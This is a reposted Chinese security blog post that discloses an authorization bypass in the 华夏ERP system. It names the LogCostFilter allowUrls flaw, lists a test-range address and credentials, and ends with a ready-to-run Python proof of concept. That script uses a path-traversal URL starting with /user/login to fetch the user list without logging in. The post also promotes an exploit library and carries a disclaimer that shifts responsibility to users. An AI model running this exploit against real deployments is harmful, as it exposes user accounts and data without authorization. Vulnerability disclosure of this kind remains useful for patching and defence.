华夏ERP另一处授权绕过漏洞

  • A+
所属分类:安全漏洞

继续这个测试靶场。。

靶场地址

http://47.116.69.14

账户密码

jsh

123456

1、描述


华夏ERP基于SpringBoot框架和SaaS模式,可以算作是国内人气比较高的一款ERP项目,但经过源码审计发现其存在多个漏洞,本篇为第二处授权绕过漏洞。







2、影响范围



华夏ERP







3、漏洞复现


从开源项目本地搭建来进行审计,源码下载地址:

百度网盘 https://pan.baidu.com/s/1jlild9uyGdQ7H2yaMx76zw  提取码:814g







漏洞复现:

1、漏洞代码位置,利用filter做登录判断

com.jsh.erp.filter.LogCostFilter

华夏ERP另一处授权绕过漏洞

如果URL开头匹配到了allowUrls中的内容则不跳转登录界面

追踪一下allowUrls的值:

华夏ERP另一处授权绕过漏洞

allowUrls将/user/login#/user/registerUser以#分割成数组:
[“/user/login”,”/user/registerUser”]

下面我们需要将url开头设置为数组中的内容即可:

就比如/user/login/

华夏ERP另一处授权绕过漏洞

或者设置为/user/registerUser/

华夏ERP另一处授权绕过漏洞


POC


使用方法:

python3 华夏ERP授权绕过2.py http://ip:port

源码:

import sys,requests
def main(ip): url = "{ip}/user/login/../../user/getUserList?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D&currentPage=1&pageSize=15".format(ip=ip) res = requests.get(url,verify=False,timeout=5) if res.status_code == 200: print("+ {ip} 访问成功n{data}".format(ip=ip,data=res.text))main(sys.argv[1])


最后再给大家介绍一下漏洞库,地址:wiki.xypbk.com

华夏ERP另一处授权绕过漏洞

华夏ERP另一处授权绕过漏洞

华夏ERP另一处授权绕过漏洞

华夏ERP另一处授权绕过漏洞

本站暂不开源,因为想控制影响范围,若因某些人乱搞,造成了严重后果,本站将即刻关闭。


漏洞库内容来源于互联网&&零组文库&&peiqi文库&&自挖漏洞&&乐于分享的师傅供大家方便检索,绝无任何利益


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


若有愿意分享自挖漏洞的佬师傅请公众号后台留言,本站将把您供上,并在此署名,天天烧香那种!



华夏ERP另一处授权绕过漏洞

扫取二维码获取

更多精彩

华夏ERP另一处授权绕过漏洞

Qingy之安全

华夏ERP另一处授权绕过漏洞




华夏ERP另一处授权绕过漏洞

点个在看你最好看






本文始发于微信公众号(Qingy之安全):华夏ERP另一处授权绕过漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: